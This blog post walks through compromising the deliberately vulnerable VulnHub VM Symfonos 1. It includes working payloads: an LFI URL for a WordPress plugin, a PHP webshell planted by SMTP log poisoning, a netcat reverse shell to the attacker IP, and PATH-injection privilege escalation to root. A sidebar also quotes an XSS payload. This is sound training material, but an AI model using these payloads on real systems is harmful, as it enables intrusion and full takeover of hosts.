Saturday, October 26, 2019

VulnHub: Symfonos 1 Walkthrough

First lets start off with an nmap scan of the remote host. 

root@ubuntu:~# nmap -sV -sC -O -T5 192.168.56.102

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-25 14:41 MDT
Nmap scan report for 192.168.56.102
Host is up (0.00064s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
|   256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_  256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (EdDSA)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after:  2029-06-26T00:29:42
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:F0:3A:FA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: Hosts:  symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -6h00m02s, deviation: 0s, median: -6h00m02s
|_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos
|   NetBIOS computer name: SYMFONOS\x00
|   Domain name: \x00
|   FQDN: symfonos
|_  System time: 2019-10-25T09:41:42-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-10-25 08:41:42
|_  start_date: 1600-12-31 17:00:04

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.96 seconds
root@ubuntu:~#

NMAP returns a lot of results and seems ports 22,25,80,139 and 445 are open. Lets start off by enumerating the smtp server for potental users on the system using metasploit. 

msf5 auxiliary(scanner/smtp/smtp_enum) > run

[*] 192.168.56.102:25     - 192.168.56.102:25 Banner: 220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
[+] 192.168.56.102:25     - 192.168.56.102:25 Users found: , backup, bin, daemon, ftp, games, gnats, irc, list, lp, mail, man, messagebus, news, nobody, postmaster, proxy, sshd, sync, sys, uucp, webmaster, www, www-data
[*] 192.168.56.102:25     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smtp/smtp_enum) >

Metasploit didnt come back with anything interestings so lets move on to ports 139 and 445. We see that smb sharing is active lets connect to the server and see if we can list the shares on the server. 

root@ubuntu:~# smbclient -L //192.168.56.102 -N
WARNING: The "syslog" option is deprecated

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	helios          Disk      Helios personal share
	anonymous       Disk      
	IPC$            IPC       IPC Service (Samba 4.5.16-Debian)
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            SYMFONOS
root@ubuntu:~#

We found two shares 'helios' and 'anonymous' lets connect to anonymous and see if there are any files in there. 

root@ubuntu:~# smbclient //192.168.56.102/anonymous -N
WARNING: The "syslog" option is deprecated
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun 28 19:14:49 2019
  ..                                  D        0  Fri Jun 28 19:12:15 2019
  attention.txt                       N      154  Fri Jun 28 19:14:49 2019

		19994224 blocks of size 1024. 17304232 blocks available
smb: \> more attention.txt
getting file \attention.txt of size 154 as /tmp/smbmore.J6XJzb (5.2 KiloBytes/sec) (average 5.2 KiloBytes/sec)
smb: \> get attention.txt
getting file \attention.txt of size 154 as attention.txt (50.1 KiloBytes/sec) (average 9.4 KiloBytes/sec)
smb: \> 

root@ubuntu:~# cat attention.txt

Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'! 

Next person I find using one of these passwords will be fired!

-Zeus

root@ubuntu:~#

We find a file telling us some passwords not to use lets go back to the console and try to login in to the helios share with one of the following passwords. 

root@ubuntu:~# smbclient //192.168.56.102/helios --user=helios
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\helios's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun 28 18:32:05 2019
  ..                                  D        0  Fri Jun 28 18:37:04 2019
  research.txt                        A      432  Fri Jun 28 18:32:05 2019
  todo.txt                            A       52  Fri Jun 28 18:32:05 2019

		19994224 blocks of size 1024. 17278144 blocks available
smb: \> 

1. Binge watch Dexter
2. Dance
3. Work on /h3l105

The password for the user helios is 'qwerty' and we find two files in the share. Research.txt didnt have much information, but todo.txt gives us a directory to work with, if we visit /h3l105 we find a wordpress install. Now its time to fire up wpscan and lets see what if can find. 

[+] admin
 | Detected By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://symfonos.local/h3l105/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

Plugins

[+] mail-masta
 | Location: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt

[+] site-editor
 | Location: http://symfonos.local/h3l105/wp-content/plugins/site-editor/
 | Latest Version: 1.1.1 (up to date)
 | Last Updated: 2017-05-02T23:34:00.000Z
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.1.1 (80% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/site-editor/readme.txt

wpscan came back with some good results we found two plugins we can search for vulnerabiltes for the mail-masta and site editor. After doing some searching, I found a working exploit here: https:/www.exploit-db.com/exploits/40290 . So now all there is to do is paste the url in and include files from the remote system. 

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin 
sys:x:3:3:sys:/dev:/usr/sbin/nologin 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/usr/sbin/nologin 
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 
systemd-timesync:x:100:102:systemd 
Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd 
Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd 
Resolver,,,:/run/systemd/resolve:/bin/false 
systemd-bus-proxy:x:103:105:systemd 
Bus Proxy,,,:/run/systemd:/bin/false _apt:x:104:65534::/nonexistent:/bin/false 
Debian-exim:x:105:109::/var/spool/exim4:/bin/false 
messagebus:x:106:111::/var/run/dbus:/bin/false 
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin 
helios:x:1000:1000:,,,:/home/helios:/bin/bash 
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false 
postfix:x:109:115::/var/spool/postfix:/bin/false

We see the user 'helios' is on the system. Now we need to poison a log file so that we can include it and execute commands on the remote system. If you remember there is a SMTP server running on the remote host. We can posion the mail log file and include it in the LFI on the wordpress site and run commands if all goes well. 

root@ubuntu:~/src/nikto/program# telnet 192.168.56.102 25
Trying 192.168.56.102...
Connected to 192.168.56.102.
Escape character is '^]'.
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
MAIL FROM: 
250 2.1.0 Ok
RCPT TO helios
501 5.5.4 Syntax: RCPT TO:

RCPT TO: helios
250 2.1.5 Ok
data
354 End data with <CRgt;<LF>.<CRgt;<LFgt;
<?php system($_GET['c']); ?gt;       
.
250 2.0.0 Ok: queued as 9FDE640698
quit
221 2.0.0 Bye
Connection closed by foreign host.
root@ubuntu:~/src/nikto/program#

We successfully added our php code to a place where the log file will print out the contents of our message which will be interepted as php code on the remote host. What we want is a reverse shell so we try netcat and see if it works. 

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&c=nc -e /bin/bash 192.168.56.101 4444

root@kali:~# nc -l -v -p 4444
listening on [any] 4444 ...
192.168.56.102: inverse host lookup failed: Unknown host
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 49342
python -c 'import pty; pty.spawn("/bin/bash")'



We get a connect back and drop to a system shell. Our next task is to search for SUID able file on the remote host.




helios@symfonos:/var/www/html/h3l105$ find / -xdev -perm -4000 -type f 2>/dev/null
<3l105$ find / -xdev -perm -4000 -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/opt/statuscheck
/bin/mount
/bin/umount
/bin/su
/bin/ping
helios@symfonos:/var/www/html/h3l105$ 




We find one that sticks out '/opt/statuscheck'. If we run strings on the binary we get back some interesting results.



helios@symfonos:/var/www/html/h3l105$ strings /opt/statuscheck
strings /opt/statuscheck
/lib64/ld-linux-x86-64.so.2
libc.so.6
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.2.5
curl -I H
http://lH
ocalhostH
AWAVA
AUATL
[]A\A]A^A_
;*3$"
GCC: (Debian 6.3.0-18+deb9u1) 6.3.0 20170516
helios@symfonos:/var/www/html/h3l105$ 




We can see that is executes the command 'curl -I http://localhost'. What we want to do is elevate our privelges using the statuscheck program and PATH injection. First we change directory to /tmp so we can set up our bogus curl binary.



helios@symfonos:/var/www/html/h3l105$ cd /tmp
cd /tmp
helios@symfonos:/tmp$ echo "/bin/sh" > curl
echo "/bin/sh" > curl
helios@symfonos:/tmp$ chmod 777 curl




Next we will export the path /tmp in our home PATH so that it will search that directory first for any binaries to be run and it will execute our curl program with root privleges and give us a shell.



helios@symfonos:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
helios@symfonos:/tmp$ echo $PATH
echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
helios@symfonos:/tmp$ 




After that all there is to do is run /opt/statuscheck and see if we get a root shell.



helios@symfonos:/tmp$ /opt/statuscheck
/opt/statuscheck
# id
id
uid=1000(helios) gid=1000(helios) euid=0(root) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
# whoami
whoami
root
# cd /root
cd /root
# ls -la
ls -la
total 24
drwx------  2 root root 4096 Jun 28 21:09 .
drwxr-xr-x 22 root root 4096 Jun 28 19:27 ..
lrwxrwxrwx  1 root root    9 Jun 28 19:48 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Jun 28 21:03 .selected_editor
-rw-r--r--  1 root root 1735 Jun 28 19:38 proof.txt
# cat proof.txt
cat proof.txt

	Congrats on rooting symfonos:1!

                 \ __
--==/////////////[})))==*
                 / \ '          ,|
                    `\`\      //|                             ,|
                      \ `\  //,/'                           -~ |
   )             _-~~~\  |/ / |'|                       _-~  / ,
  ((            /' )   | \ / /'/                    _-~   _/_-~|
 (((            ;  /`  ' )/ /''                 _ -~     _-~ ,/'
 ) ))           `~~\   `\\/'/|'           __--~~__--\ _-~  _/, 
((( ))            / ~~    \ /~      __--~~  --~~  __/~  _-~ /
 ((\~\           |    )   | '      /        __--~~  \-~~ _-~
    `\(\    __--(   _/    |'\     /     --~~   __--~' _-~ ~|
     (  ((~~   __-~        \~\   /     ___---~~  ~~\~~__--~ 
      ~~\~~~~~~   `\-~      \~\ /           __--~~~'~~/
                   ;\ __.-~  ~-/      ~~~~~__\__---~~ _..--._
                   ;;;;;;;;'  /      ---~~~/_.-----.-~  _.._ ~\     
                  ;;;;;;;'   /      ----~~/         `\,~    `\ \        
                  ;;;;'     (      ---~~/         `:::|       `\\.      
                  |'  _      `----~~~~'      /      `:|        ()))),      
            ______/\/~    |                 /        /         (((((())  
          /~;;.____/;;'  /          ___.---(   `;;;/             )))'`))
         / //  _;______;'------~~~~~    |;;/\    /                ((   ( 
        //  \ \                        /  |  \;;,\                 `   
       (<_    \ \                    /',/-----'  _> 
        \_|     \\_                 //~;~~~~~~~~~ 
                 \_|               (,~~   
                                    \~\
                                     ~~

	Contact me via Twitter @zayotic to give feedback!


# 




As you can see our binary executed just as we planned and gave us a root shell
at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...

  • Enumerating SNMP Servers with NMAP
    NMAP gives you the ability to use scripts to enumerate and exploit remote host with the use of the NMAP Scripting Engine. Today we will be ...
  • Exploring POP3 Servers
    Scanning the remote host We can use NMAP to scan the remote host and run enumeration scripts against the POP3 server. root@asus:~/unix% ...
  • Enumerating SMTP Servers with NMAP
    NMAP gives you the ability to enumerate SMTP service with some scripts from the NMAP Scripting Enigne. These scripts will produce some gene...
  • Testing LDAP servers with examples
    Today we are going to be attacking the remote service LDAP. The only thing we need is an IP Address so lets ping our host to verify its up ...
  • Enumerating UNIX usernames
    Sometimes you may come across a situation where all you have from your OSINT phase is a list of first and last names. you can use pre-built...
  • Metasploitable II: Samba Shares
    Lets first start off with an nmap scan of the remote host. root@ubuntu:~# nmap -p 139,445 -sV -sC 192.168.56.101 Starting Nmap 7.60 ( ht...
  • DVWA: File Upload
    Our goal is to exploit the weakness in file upload checking and obtain a remote system shell on the host. We start off with the security b...
  • bWAPP XSS Injections
    Cross-site-Scripting - Reflected (GET) Payload: <script>alert(1)</script> Cross-site-Scripting - Reflected (POST) Payload:...
  • bWAPP CSRF
    CSRF (Change Password) The first challenge is the change password CSRF. Our goal is to successfully change the users password with out log...
  • bWAPP Remote & Local File Inclusion (RFI/LFI)
    In bWAPP There is a module for RFI and LFI injections. Our goal is to exploit these vulnerabilities and get local access to the remote mac...